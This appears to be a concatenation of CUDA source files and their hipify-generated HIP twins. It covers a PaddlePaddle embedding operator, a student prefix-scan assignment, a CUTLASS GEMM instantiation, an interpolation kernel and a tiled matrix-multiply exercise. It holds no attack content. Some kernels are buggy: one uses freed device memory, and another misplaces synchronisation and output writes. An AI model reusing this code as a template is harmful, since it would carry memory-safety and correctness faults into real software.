efec454fba703ef2971be0167ec081f49e46d00e.cu
/* Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ #include "paddle/fluid/framework/eigen.h" #include "paddle/fluid/framework/op_registry.h" #include "paddle/fluid/operators/collective/c_embedding_op.h" #include "paddle/fluid/platform/cuda_primitives.h" #include "paddle/fluid/platform/float16.h" namespace paddle { namespace operators { static constexpr int kNumCUDAThreads = 512; static constexpr int kNumMaxinumNumBlocks = 4096; static inline int NumBlocks(const int N) { return std::min((N + kNumCUDAThreads - 1) / kNumCUDAThreads, kNumMaxinumNumBlocks); } template <typename T, typename IndexT> __global__ void CEmbedding(T *out, const T *table, const IndexT *ids, const int rows, const int columns, const int64_t N, const int64_t start_idx, const int64_t end_idx, const int64_t limit) { CUDA_KERNEL_LOOP(i, limit) { size_t row = i / columns; size_t col = i % columns; auto id = ids[row]; if (id >= start_idx && id < end_idx) { auto real_idx = id - start_idx; PADDLE_ENFORCE(real_idx < N, "The index is out of bounds, " "please check whether the dimensions of index and " "input meet the requirements. It should " "be less than [%d], but received [%d]", N, real_idx); out[i] = table[real_idx * columns + col]; } else { out[i] = static_cast<T>(0); } } } template <typename T, typename IndexT> __global__ void CEmbeddingGrad(T *table, const T *output, const IndexT *ids, const int rows, const int columns, const int64_t N, const int64_t start_idx, const int64_t end_idx, const int64_t limit) { CUDA_KERNEL_LOOP(i, limit) { size_t row = i / columns; size_t col = i % columns; auto id = ids[row]; if (id >= start_idx && id < end_idx) { auto real_idx = id - start_idx; paddle::platform::CudaAtomicAdd(&table[real_idx * columns + col], output[i]); } } } template <typename T> class CEmbeddingCUDAKernel : public framework::OpKernel<T> { public: void Compute(const framework::ExecutionContext &context) const override { auto *table_t = context.Input<LoDTensor>("W"); auto *ids_t = context.Input<LoDTensor>("Ids"); auto *output_t = context.Output<LoDTensor>("Out"); const auto &dev_ctx = context.template device_context<platform::CUDADeviceContext>(); const int64_t start_idx = context.Attr<int64_t>("start_index"); size_t N = table_t->dims()[0]; size_t D = table_t->dims()[1]; size_t K = ids_t->numel(); const int64_t end_idx = start_idx + N; auto *table = table_t->data<T>(); auto *output = output_t->mutable_data<T>(context.GetPlace()); auto limit = K * D; int blocks = NumBlocks(limit); int threads = kNumCUDAThreads; const auto &index_type = ids_t->type(); if (index_type == framework::proto::VarType::INT32) { CEmbedding<T, int32_t><<<blocks, threads, 0, dev_ctx.stream()>>>( output, table, ids_t->data<int32_t>(), K, D, N, start_idx, end_idx, limit); } else if (index_type == framework::proto::VarType::INT64) { CEmbedding<T, int64_t><<<blocks, threads, 0, dev_ctx.stream()>>>( output, table, ids_t->data<int64_t>(), K, D, N, start_idx, end_idx, limit); } else { PADDLE_THROW(platform::errors::Unavailable( "GPU c_embedding ids only support int32 or int64.")); } } }; template <typename T> class CEmbeddingGradCUDAKernel : public framework::OpKernel<T> { public: void Compute(const framework::ExecutionContext &context) const override { const auto &dev_ctx = context.template device_context<platform::CUDADeviceContext>(); const int64_t start_idx = context.Attr<int64_t>("start_index"); auto ids_t = context.Input<LoDTensor>("Ids"); auto d_output_t = context.Input<LoDTensor>(framework::GradVarName("Out")); auto d_table_t = context.Output<LoDTensor>(framework::GradVarName("W")); int N = d_table_t->dims()[0]; int D = d_table_t->dims()[1]; int K = ids_t->numel(); const int64_t end_idx = start_idx + N; auto limit = K * D; int blocks = NumBlocks(limit); int threads = kNumCUDAThreads; const T *d_output = d_output_t->data<T>(); T *d_table = d_table_t->mutable_data<T>(context.GetPlace()); auto t = framework::EigenVector<T>::Flatten(*d_table_t); t.device(*dev_ctx.eigen_device()) = t.constant(static_cast<T>(0)); const auto &index_type = ids_t->type(); if (index_type == framework::proto::VarType::INT32) { CEmbeddingGrad<T, int32_t><<<blocks, threads, 0, dev_ctx.stream()>>>( d_table, d_output, ids_t->data<int32_t>(), K, D, N, start_idx, end_idx, limit); } else if (index_type == framework::proto::VarType::INT64) { CEmbeddingGrad<T, int64_t><<<blocks, threads, 0, dev_ctx.stream()>>>( d_table, d_output, ids_t->data<int64_t>(), K, D, N, start_idx, end_idx, limit); } } }; } // namespace operators } // namespace paddle namespace ops = paddle::operators; namespace plat = paddle::platform; REGISTER_OP_CUDA_KERNEL(c_embedding, ops::CEmbeddingCUDAKernel<float>, ops::CEmbeddingCUDAKernel<double>, ops::CEmbeddingCUDAKernel<plat::float16>); REGISTER_OP_CUDA_KERNEL(c_embedding_grad, ops::CEmbeddingGradCUDAKernel<float>, ops::CEmbeddingGradCUDAKernel<double>, ops::CEmbeddingGradCUDAKernel<plat::float16>);
8c568d4f283a5aa53c549460423fc1a78eb7f47b.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /** * University of Pittsburgh * Department of Computer Science * CS1645: Introduction to HPC Systems * Instructor Bryan Mills, PhD * This is a skeleton for implementing prefix sum using GPU, inspired * by nvidia course of similar name. * * student: Charles Smith <[email protected]> */ #include <stdio.h> #include "timer.h" #include <math.h> #include <string.h> #define N 512 /* * You should implement the simple scan function here! */ __global__ void scan_simple(float *g_odata, float *g_idata, int n) { extern __shared__ float temp[]; // STUDENT: YOUR CODE GOES HERE. g_odata[threadIdx.x] = 0.0; int pin=1, pout=0; //keep track of where in the temp array we are. 0 for first half, 1 for second if(threadIdx.x<511) temp[threadIdx.x+1] = g_idata[threadIdx.x]; int offset; //how far away we're adding from for(offset=1; offset<n; offset*=2){ //swap the buffers pin =1 - pin ; pout =1 - pout; //in general we try to avoid branching on GPUs as it is a giant decrease to preformance //but there's not to many ways around this one if(threadIdx.x>=offset)//we have work to do! temp[pout*n+threadIdx.x] = temp[pin*n+threadIdx.x] + temp[pin*n+threadIdx.x - offset]; //sum else //we already found the answer, let's keep track of it temp[pout*n+threadIdx.x] = temp[pin*n+threadIdx.x]; __syncthreads(); //don't want to do work before everyone is ready } //great! we have the answer! (i think...) let's copy it to the output buffer g_odata[threadIdx.x] = temp[pout*n+threadIdx.x]; } /* * You should implement the prescan kernel function here! */ __global__ void prescan(float *g_odata, float *g_idata, int n) { extern __shared__ float temp[]; //to many headaches working on this.... I looked at the linked code and started fresh. // g_odata[threadIdx.x] = g_idata[threadIdx.x]; // // // STUDENT: YOUR CODE GOES HERE. // temp[threadIdx.x] = g_idata[threadIdx.x]; // // int offset = 1; //how far to move the data // //upsweep // __syncthreads();//get everyone together // for(; offset<n; offset*=2){ // if(!(threadIdx.x+1)%(offset*2)) // temp[threadIdx.x] += temp[threadIdx.x-offset]; // __syncthreads(); // printf("offset = %d, temp = %f, threadIdx.x = %d\n",offset, temp[threadIdx.x], threadIdx.x); // } // // if(threadIdx.x==0) // temp[n-1] = 0; //clear the last entry // // offset/=2; // __syncthreads(); // // //downsweep // for(; offset>=1;offset/=2){ // if(!(threadIdx.x+1)%(offset*2)){ // //swaps // float t = temp[threadIdx.x-offset]; // temp[threadIdx.x-offset] = temp[threadIdx.x]; // temp[threadIdx.x]+=t; // // } // __syncthreads(); // printf("offset = %d, temp = %f, threadIdx.x = %d\n",offset, temp[threadIdx.x], threadIdx.x); // __syncthreads(); // } // printf("temp[%d] = %f\n", threadIdx.x, temp[threadIdx.x]); // g_odata[threadIdx.x]=temp[threadIdx.x]; // printf("g_odata[%d] = %f\n", threadIdx.x, g_odata[threadIdx.x]); int offset = 1; temp[2*threadIdx.x] = g_idata[2*threadIdx.x]; temp[2*threadIdx.x+1] = g_idata[2*threadIdx.x+1]; for(int i = n/2; i > 0; i/=2){ __syncthreads(); if(threadIdx.x < i) { int ai = offset*(2*threadIdx.x+1)-1; int bi = offset*(2*threadIdx.x+2)-1; temp[bi] += temp[ai]; } offset *= 2; } if(threadIdx.x == 0) { temp[n - 1] = 0; } for(int i = 1; i < n; i *= 2) { offset /= 2; __syncthreads(); if(threadIdx.x < i){ int ai = offset*(2*threadIdx.x+1)-1; int bi = offset*(2*threadIdx.x+2)-1; float t = temp[ai]; temp[ai] = temp[bi]; temp[bi] += t; } __syncthreads(); } __syncthreads(); //HEY LOOK IT COPIES THIS TIME AHHHHHHHHH g_odata[2*threadIdx.x] = temp[2*threadIdx.x]; g_odata[2*threadIdx.x+1] = temp[2*threadIdx.x+1]; } /* * Fills an array a with n random floats. */ void random_floats(float* a, int n) { float d; // Comment out this line if you want consistent "random". srand(time(NULL)); for (int i = 0; i < n; ++i) { d = rand() % 8; a[i] = ((rand() % 64) / (d > 0 ? d : 1)); } } /* * Simple Serial implementation of scan. */ void serial_scan(float* out, float* in, int n) { float total_sum = 0; out[0] = 0; for (int i = 1; i < n; i++) { total_sum += in[i-1]; out[i] = out[i-1] + in[i-1]; } if (total_sum != out[n-1]) { printf("Warning: exceeding accuracy of float.\n"); } } /* * This is a simple function that confirms that the output of the scan * function matches that of a golden image (array). */ bool printError(float *gold_out, float *test_out, bool show_all) { bool firstFail = true; bool error = false; float epislon = 0.1; float diff = 0.0; for (int i = 0; i < N; ++i) { diff = abs(gold_out[i] - test_out[i]); if ((diff > epislon) && firstFail) { printf("ERROR: gold_out[%d] = %f != test_out[%d] = %f // diff = %f \n", i, gold_out[i], i, test_out[i], diff); firstFail = show_all; error = true; } } return error; } int main(void) { float *in, *out, *gold_out; // host float *d_in, *d_out; // device int size = sizeof(float) * N; timerStart(); hipMalloc((void **)&d_in, size); hipMalloc((void **)&d_out, size); in = (float *)malloc(size); random_floats(in, N); out = (float *)malloc(size); gold_out = (float *)malloc(size); printf("TIME: Init took %d ms\n", timerStop()); // *********** // RUN SERIAL SCAN // *********** timerStart(); serial_scan(gold_out, in, N); printf("TIME: Serial took %d ms\n", timerStop()); timerStart(); hipMemcpy(d_in, in, size, hipMemcpyHostToDevice); printf("TIME: Copy took %d ms\n", timerStop()); // *********** // RUN SIMPLE SCAN // *********** timerStart(); hipLaunchKernelGGL(( scan_simple), dim3(1), dim3(512), N * 2 * sizeof(float), 0, d_out, d_in, N); hipDeviceSynchronize(); printf("TIME: Simple kernel took %d ms\n", timerStop()); timerStart(); hipMemcpy(out, d_out, size, hipMemcpyDeviceToHost); printf("TIME: Copy back %d ms\n", timerStop()); if (printError(gold_out, out, true)) { printf("ERROR: The simple scan function failed to produce proper output.\n"); //printf("produced output:\n"); //for(int i=0; i<512; i++){ // printf("%d: %f\n",i, out[i]); //} } else { printf("CONGRATS: The simple scan function produced proper output.\n"); } out[0]=-2; out[1]=-2; // *********** // RUN PRESCAN // note size change in number of threads, only need 256 because each // thread should handle 2 elements. // *********** timerStart(); hipLaunchKernelGGL(( prescan), dim3(1), dim3(256), N * 2 * sizeof(float), 0, d_out, d_in, N); hipDeviceSynchronize(); printf("TIME: Prescan kernel took %d ms\n", timerStop()); timerStart(); hipMemcpy(out, d_out, size, hipMemcpyDeviceToHost); printf("TIME: Copy back %d ms\n", timerStop()); if (printError(gold_out, out, true)) { printf("ERROR: The prescan function failed to produce proper output.\n"); } else { printf("CONGRATS: The prescan function produced proper output.\n"); } return 0; }
8c568d4f283a5aa53c549460423fc1a78eb7f47b.cu
/** * University of Pittsburgh * Department of Computer Science * CS1645: Introduction to HPC Systems * Instructor Bryan Mills, PhD * This is a skeleton for implementing prefix sum using GPU, inspired * by nvidia course of similar name. * * student: Charles Smith <[email protected]> */ #include <stdio.h> #include "timer.h" #include <math.h> #include <string.h> #define N 512 /* * You should implement the simple scan function here! */ __global__ void scan_simple(float *g_odata, float *g_idata, int n) { extern __shared__ float temp[]; // STUDENT: YOUR CODE GOES HERE. g_odata[threadIdx.x] = 0.0; int pin=1, pout=0; //keep track of where in the temp array we are. 0 for first half, 1 for second if(threadIdx.x<511) temp[threadIdx.x+1] = g_idata[threadIdx.x]; int offset; //how far away we're adding from for(offset=1; offset<n; offset*=2){ //swap the buffers pin =1 - pin ; pout =1 - pout; //in general we try to avoid branching on GPUs as it is a giant decrease to preformance //but there's not to many ways around this one if(threadIdx.x>=offset)//we have work to do! temp[pout*n+threadIdx.x] = temp[pin*n+threadIdx.x] + temp[pin*n+threadIdx.x - offset]; //sum else //we already found the answer, let's keep track of it temp[pout*n+threadIdx.x] = temp[pin*n+threadIdx.x]; __syncthreads(); //don't want to do work before everyone is ready } //great! we have the answer! (i think...) let's copy it to the output buffer g_odata[threadIdx.x] = temp[pout*n+threadIdx.x]; } /* * You should implement the prescan kernel function here! */ __global__ void prescan(float *g_odata, float *g_idata, int n) { extern __shared__ float temp[]; //to many headaches working on this.... I looked at the linked code and started fresh. // g_odata[threadIdx.x] = g_idata[threadIdx.x]; // // // STUDENT: YOUR CODE GOES HERE. // temp[threadIdx.x] = g_idata[threadIdx.x]; // // int offset = 1; //how far to move the data // //upsweep // __syncthreads();//get everyone together // for(; offset<n; offset*=2){ // if(!(threadIdx.x+1)%(offset*2)) // temp[threadIdx.x] += temp[threadIdx.x-offset]; // __syncthreads(); // printf("offset = %d, temp = %f, threadIdx.x = %d\n",offset, temp[threadIdx.x], threadIdx.x); // } // // if(threadIdx.x==0) // temp[n-1] = 0; //clear the last entry // // offset/=2; // __syncthreads(); // // //downsweep // for(; offset>=1;offset/=2){ // if(!(threadIdx.x+1)%(offset*2)){ // //swaps // float t = temp[threadIdx.x-offset]; // temp[threadIdx.x-offset] = temp[threadIdx.x]; // temp[threadIdx.x]+=t; // // } // __syncthreads(); // printf("offset = %d, temp = %f, threadIdx.x = %d\n",offset, temp[threadIdx.x], threadIdx.x); // __syncthreads(); // } // printf("temp[%d] = %f\n", threadIdx.x, temp[threadIdx.x]); // g_odata[threadIdx.x]=temp[threadIdx.x]; // printf("g_odata[%d] = %f\n", threadIdx.x, g_odata[threadIdx.x]); int offset = 1; temp[2*threadIdx.x] = g_idata[2*threadIdx.x]; temp[2*threadIdx.x+1] = g_idata[2*threadIdx.x+1]; for(int i = n/2; i > 0; i/=2){ __syncthreads(); if(threadIdx.x < i) { int ai = offset*(2*threadIdx.x+1)-1; int bi = offset*(2*threadIdx.x+2)-1; temp[bi] += temp[ai]; } offset *= 2; } if(threadIdx.x == 0) { temp[n - 1] = 0; } for(int i = 1; i < n; i *= 2) { offset /= 2; __syncthreads(); if(threadIdx.x < i){ int ai = offset*(2*threadIdx.x+1)-1; int bi = offset*(2*threadIdx.x+2)-1; float t = temp[ai]; temp[ai] = temp[bi]; temp[bi] += t; } __syncthreads(); } __syncthreads(); //HEY LOOK IT COPIES THIS TIME AHHHHHHHHH g_odata[2*threadIdx.x] = temp[2*threadIdx.x]; g_odata[2*threadIdx.x+1] = temp[2*threadIdx.x+1]; } /* * Fills an array a with n random floats. */ void random_floats(float* a, int n) { float d; // Comment out this line if you want consistent "random". srand(time(NULL)); for (int i = 0; i < n; ++i) { d = rand() % 8; a[i] = ((rand() % 64) / (d > 0 ? d : 1)); } } /* * Simple Serial implementation of scan. */ void serial_scan(float* out, float* in, int n) { float total_sum = 0; out[0] = 0; for (int i = 1; i < n; i++) { total_sum += in[i-1]; out[i] = out[i-1] + in[i-1]; } if (total_sum != out[n-1]) { printf("Warning: exceeding accuracy of float.\n"); } } /* * This is a simple function that confirms that the output of the scan * function matches that of a golden image (array). */ bool printError(float *gold_out, float *test_out, bool show_all) { bool firstFail = true; bool error = false; float epislon = 0.1; float diff = 0.0; for (int i = 0; i < N; ++i) { diff = abs(gold_out[i] - test_out[i]); if ((diff > epislon) && firstFail) { printf("ERROR: gold_out[%d] = %f != test_out[%d] = %f // diff = %f \n", i, gold_out[i], i, test_out[i], diff); firstFail = show_all; error = true; } } return error; } int main(void) { float *in, *out, *gold_out; // host float *d_in, *d_out; // device int size = sizeof(float) * N; timerStart(); cudaMalloc((void **)&d_in, size); cudaMalloc((void **)&d_out, size); in = (float *)malloc(size); random_floats(in, N); out = (float *)malloc(size); gold_out = (float *)malloc(size); printf("TIME: Init took %d ms\n", timerStop()); // *********** // RUN SERIAL SCAN // *********** timerStart(); serial_scan(gold_out, in, N); printf("TIME: Serial took %d ms\n", timerStop()); timerStart(); cudaMemcpy(d_in, in, size, cudaMemcpyHostToDevice); printf("TIME: Copy took %d ms\n", timerStop()); // *********** // RUN SIMPLE SCAN // *********** timerStart(); scan_simple<<< 1, 512, N * 2 * sizeof(float)>>>(d_out, d_in, N); cudaDeviceSynchronize(); printf("TIME: Simple kernel took %d ms\n", timerStop()); timerStart(); cudaMemcpy(out, d_out, size, cudaMemcpyDeviceToHost); printf("TIME: Copy back %d ms\n", timerStop()); if (printError(gold_out, out, true)) { printf("ERROR: The simple scan function failed to produce proper output.\n"); //printf("produced output:\n"); //for(int i=0; i<512; i++){ // printf("%d: %f\n",i, out[i]); //} } else { printf("CONGRATS: The simple scan function produced proper output.\n"); } out[0]=-2; out[1]=-2; // *********** // RUN PRESCAN // note size change in number of threads, only need 256 because each // thread should handle 2 elements. // *********** timerStart(); prescan<<< 1, 256, N * 2 * sizeof(float)>>>(d_out, d_in, N); cudaDeviceSynchronize(); printf("TIME: Prescan kernel took %d ms\n", timerStop()); timerStart(); cudaMemcpy(out, d_out, size, cudaMemcpyDeviceToHost); printf("TIME: Copy back %d ms\n", timerStop()); if (printError(gold_out, out, true)) { printf("ERROR: The prescan function failed to produce proper output.\n"); } else { printf("CONGRATS: The prescan function produced proper output.\n"); } return 0; }
9b4119d2c54ba1f963e217634a10ec46641a262f.hip
// !!! This is a file automatically generated by hipify!!! #if __CUDACC_VER_MAJOR__ > 9 || (__CUDACC_VER_MAJOR__ == 9 && __CUDACC_VER_MINOR__ >= 2) // generated by gen_cutlass_matrix_mul_kern_impls.py // ignore warning of cutlass #pragma GCC diagnostic push #pragma GCC diagnostic ignored "-Wunused-parameter" #pragma GCC diagnostic ignored "-Wstrict-aliasing" #pragma GCC diagnostic ignored "-Wuninitialized" #pragma GCC diagnostic ignored "-Wmaybe-uninitialized" #include "src/cuda/matrix_mul/fp32_simt/matrix_mul_float_simt_cutlass_wrapper.cuinl" using LayoutA = cutlass::layout::ColumnMajor; using LayoutB = cutlass::layout::RowMajor; using ThreadBlockShape = cutlass::gemm::GemmShape<8, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using EpilogueOp = cutlass::epilogue::thread::LinearCombination<float, 1, float, float>; using Gemm = cutlass::gemm::device::Gemm< float, LayoutA, float, LayoutB, float, cutlass::layout::RowMajor, float, cutlass::arch::OpClassSimt, cutlass::arch::Sm50, ThreadBlockShape, WarpShape, InstructionShape, EpilogueOp, cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; template void megdnn::cuda::cutlass_wrapper::cutlass_matrix_mul_wrapper<Gemm>( const typename Gemm::ElementA* d_A, size_t lda, const typename Gemm::ElementB* d_B, size_t ldb, typename Gemm::ElementC* d_C, size_t ldc, int* workspace, cutlass::gemm::GemmCoord const& problem_size, typename Gemm::EpilogueOutputOp::Params const& epilogue, hipStream_t stream, int split_k_slices); #pragma GCC diagnostic pop #endif
9b4119d2c54ba1f963e217634a10ec46641a262f.cu
#if __CUDACC_VER_MAJOR__ > 9 || (__CUDACC_VER_MAJOR__ == 9 && __CUDACC_VER_MINOR__ >= 2) // generated by gen_cutlass_matrix_mul_kern_impls.py // ignore warning of cutlass #pragma GCC diagnostic push #pragma GCC diagnostic ignored "-Wunused-parameter" #pragma GCC diagnostic ignored "-Wstrict-aliasing" #pragma GCC diagnostic ignored "-Wuninitialized" #pragma GCC diagnostic ignored "-Wmaybe-uninitialized" #include "src/cuda/matrix_mul/fp32_simt/matrix_mul_float_simt_cutlass_wrapper.cuinl" using LayoutA = cutlass::layout::ColumnMajor; using LayoutB = cutlass::layout::RowMajor; using ThreadBlockShape = cutlass::gemm::GemmShape<8, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using EpilogueOp = cutlass::epilogue::thread::LinearCombination<float, 1, float, float>; using Gemm = cutlass::gemm::device::Gemm< float, LayoutA, float, LayoutB, float, cutlass::layout::RowMajor, float, cutlass::arch::OpClassSimt, cutlass::arch::Sm50, ThreadBlockShape, WarpShape, InstructionShape, EpilogueOp, cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; template void megdnn::cuda::cutlass_wrapper::cutlass_matrix_mul_wrapper<Gemm>( const typename Gemm::ElementA* d_A, size_t lda, const typename Gemm::ElementB* d_B, size_t ldb, typename Gemm::ElementC* d_C, size_t ldc, int* workspace, cutlass::gemm::GemmCoord const& problem_size, typename Gemm::EpilogueOutputOp::Params const& epilogue, cudaStream_t stream, int split_k_slices); #pragma GCC diagnostic pop #endif
7bf495367384f61473698407bd148cb97aa168bc.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "includes.h" // ERROR CHECKING MACROS ////////////////////////////////////////////////////// __global__ void interpolateMulti(int points, int noDims, int dimRes, float* surrogate, float* predictors, float* results) { // Global thread index int idx = blockIdx.x*blockDim.x + threadIdx.x; if (idx < points) { float *lower, *upper, *coeffs; int *lowerInd; lower = (float*)malloc((noDims)*sizeof(float)); upper = (float*)malloc((noDims)*sizeof(float)); coeffs = (float*)malloc(((int)pow(2,noDims-1))*sizeof(float)); lowerInd = (int*)malloc((noDims)*sizeof(float)); for (int jj = 0; jj < noDims; jj++) { lower[jj] = surrogate[jj*dimRes]; upper[jj] = surrogate[(jj+1)*dimRes - 1]; lowerInd[jj] = (int)((dimRes-1)*(predictors[noDims*idx+jj] - lower[jj])/(upper[jj] - lower[jj])); if (lowerInd[jj] >= (dimRes-1)) { lowerInd[jj] = dimRes-2; } else if (lowerInd[jj] < 0){ lowerInd[jj] = 0; } } // Let's interpolate // Uppermost dimensions x value float x0 = surrogate[lowerInd[0]]; float x1 = surrogate[lowerInd[0]+1]; float xd = (predictors[noDims*idx] - x0)/(x1-x0); // First, assign the yvalues to the coefficients matrix for (int jj = 0; jj < (int)pow(2,noDims-1); jj++) { // Get the indices of the yvalues of the lower and upper bounding // values on this dimension. int idxL = dimRes*noDims; for (int kk = 1; kk < noDims; kk++) { int rem = ((int)(jj/((int)pow(2,noDims - kk - 1))) + 1) - 2* (int)(((int)(jj/((int)pow(2,noDims - kk - 1))) + 1)/2); if(rem > 0) { idxL += lowerInd[kk]*(int)pow(dimRes,noDims - kk - 1); } else { idxL += (lowerInd[kk]+1)*(int)pow(dimRes,noDims - kk - 1); } } int idxU = idxL + (lowerInd[0]+1)*(int)pow(dimRes,noDims-1); idxL += lowerInd[0]*(int)pow(dimRes,noDims-1); coeffs[jj] = surrogate[idxL]*(1 - xd) + surrogate[idxU]*xd; } // Now we work our way down the dimensions using our computed // coefficients to get the interpolated value. for (int jj = 1; jj < noDims; jj++) { // Get the current dimension x value x0 = surrogate[jj*dimRes + lowerInd[jj]]; x1 = surrogate[jj*dimRes + lowerInd[jj] + 1]; xd = (predictors[jj] - x0)/(x1-x0); for (int kk = 0; kk < (int)pow(2,jj); kk++) { int jump = (int)pow(2,noDims - jj - 2); coeffs[kk] = coeffs[kk]*(1 - xd) + coeffs[kk + jump]*xd; } } // Free variables free(lowerInd); free(coeffs); free(upper); free(lower); // Output the result results[idx] = coeffs[0]; } }
7bf495367384f61473698407bd148cb97aa168bc.cu
#include "includes.h" // ERROR CHECKING MACROS ////////////////////////////////////////////////////// __global__ void interpolateMulti(int points, int noDims, int dimRes, float* surrogate, float* predictors, float* results) { // Global thread index int idx = blockIdx.x*blockDim.x + threadIdx.x; if (idx < points) { float *lower, *upper, *coeffs; int *lowerInd; lower = (float*)malloc((noDims)*sizeof(float)); upper = (float*)malloc((noDims)*sizeof(float)); coeffs = (float*)malloc(((int)pow(2,noDims-1))*sizeof(float)); lowerInd = (int*)malloc((noDims)*sizeof(float)); for (int jj = 0; jj < noDims; jj++) { lower[jj] = surrogate[jj*dimRes]; upper[jj] = surrogate[(jj+1)*dimRes - 1]; lowerInd[jj] = (int)((dimRes-1)*(predictors[noDims*idx+jj] - lower[jj])/(upper[jj] - lower[jj])); if (lowerInd[jj] >= (dimRes-1)) { lowerInd[jj] = dimRes-2; } else if (lowerInd[jj] < 0){ lowerInd[jj] = 0; } } // Let's interpolate // Uppermost dimensions x value float x0 = surrogate[lowerInd[0]]; float x1 = surrogate[lowerInd[0]+1]; float xd = (predictors[noDims*idx] - x0)/(x1-x0); // First, assign the yvalues to the coefficients matrix for (int jj = 0; jj < (int)pow(2,noDims-1); jj++) { // Get the indices of the yvalues of the lower and upper bounding // values on this dimension. int idxL = dimRes*noDims; for (int kk = 1; kk < noDims; kk++) { int rem = ((int)(jj/((int)pow(2,noDims - kk - 1))) + 1) - 2* (int)(((int)(jj/((int)pow(2,noDims - kk - 1))) + 1)/2); if(rem > 0) { idxL += lowerInd[kk]*(int)pow(dimRes,noDims - kk - 1); } else { idxL += (lowerInd[kk]+1)*(int)pow(dimRes,noDims - kk - 1); } } int idxU = idxL + (lowerInd[0]+1)*(int)pow(dimRes,noDims-1); idxL += lowerInd[0]*(int)pow(dimRes,noDims-1); coeffs[jj] = surrogate[idxL]*(1 - xd) + surrogate[idxU]*xd; } // Now we work our way down the dimensions using our computed // coefficients to get the interpolated value. for (int jj = 1; jj < noDims; jj++) { // Get the current dimension x value x0 = surrogate[jj*dimRes + lowerInd[jj]]; x1 = surrogate[jj*dimRes + lowerInd[jj] + 1]; xd = (predictors[jj] - x0)/(x1-x0); for (int kk = 0; kk < (int)pow(2,jj); kk++) { int jump = (int)pow(2,noDims - jj - 2); coeffs[kk] = coeffs[kk]*(1 - xd) + coeffs[kk + jump]*xd; } } // Free variables free(lowerInd); free(coeffs); free(upper); free(lower); // Output the result results[idx] = coeffs[0]; } }
be95215d518653bf3c128d9e6d66488923435e2a.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <stdio.h> #include <cstdlib> #include <iostream> #include <vector> #define BS 32 #define NUM_BLOCKS 1500 #define NUM_THREADS_PER_BLOCK 1500 #define SIZE NUM_BLOCKS*NUM_THREADS_PER_BLOCK using namespace std; hipEvent_t start, stop; // These are specific to measure the execution of only the kernel execution - might be useful void startKernelTime (void) { hipEventCreate(&start); hipEventCreate(&stop); hipEventRecord(start); } void stopKernelTime (void) { hipEventRecord(stop); hipEventSynchronize(stop); float milliseconds = 0; hipEventElapsedTime(&milliseconds, start, stop); cout << milliseconds << " ms have elapsed for the CUDA execution" << endl; } void checkCUDAError (const char *msg) { hipError_t err = hipGetLastError(); if( hipSuccess != err) { cerr << "Cuda error: " << msg << ", " << hipGetErrorString( err) << endl; exit(-1); } } // Fill the input parameters and kernel qualifier __global__ void dotKernel (float *dev_m1, float *dev_m2, float *dev_output) { __shared__ float shareA[BS][BS]; __shared__ float shareB[BS][BS]; int bx = blockIdx.x; int by = blockIdx.y; int tx = threadIdx.x; int ty = threadIdx.y; int row = by * BS + ty; int col = bx * BS + tx; float tmp_sum = 0.0f; for(int i = 0; i < NUM_BLOCKS/BS; ++i){ shareA[ty][tx] = dev_m1[row* NUM_BLOCKS + (i * BS + tx)]; shareB[ty][tx] = dev_m2[(i * BS + ty) * NUM_BLOCKS + col]; __syncthreads(); for(int k = 0; k < BS; ++k){ tmp_sum += shareA[ty][k] * shareB[k][tx]; __syncthreads(); } dev_output[row * NUM_BLOCKS + col] = tmp_sum; } } // Fill with the code required for the GPU dot (mem allocation, transfers, kernel launch of dotKernel) float* dotGPU (float *m1, float *m2) { float *dev_m1, *dev_m2, *dev_output; float *array_output = new float [SIZE]; // allocate the memory on the device hipMalloc((void**) &dev_m1, sizeof(float) * SIZE); hipMalloc((void**) &dev_m2, sizeof(float) * SIZE); hipMalloc((void**) &dev_output, sizeof(float) * SIZE); startKernelTime(); // copy inputs to the device hipMemcpy(dev_m1, m1, sizeof(float) * SIZE, hipMemcpyHostToDevice); hipMemcpy(dev_m2, m2, sizeof(float) * SIZE, hipMemcpyHostToDevice); hipMemcpy(dev_output, array_output, sizeof(float) * SIZE, hipMemcpyHostToDevice); dim3 blocksPerGrid(BS, BS, 1); dim3 threadsPerBlock(NUM_THREADS_PER_BLOCK/BS, NUM_THREADS_PER_BLOCK/BS, 1); // launch the kernel hipLaunchKernelGGL(( dotKernel) , dim3(blocksPerGrid), dim3(threadsPerBlock) , 0, 0, dev_m1, dev_m2, dev_output); // copy the output to the host hipMemcpy(array_output, dev_output, sizeof(float) * SIZE, hipMemcpyDeviceToHost); stopKernelTime(); for(size_t i = 0; i < 512; i++) { cout << array_output[i] << '\n'; } // free the device memory hipFree(dev_m1); hipFree(dev_m2); hipFree(dev_output); return array_output; } int main (int argc, char** argv) { float array1 [SIZE]; float array2 [SIZE]; // initialize array with random values for (unsigned i = 0; i < SIZE; i++) { array1[i] = ((float) rand()) / ((float) RAND_MAX) * 10; array2[i] = 1; } for(size_t i = 0; i < 4; i++) { cout << array1[i * NUM_BLOCKS] << '\n'; } dotGPU(array1, array2); return 0; }
be95215d518653bf3c128d9e6d66488923435e2a.cu
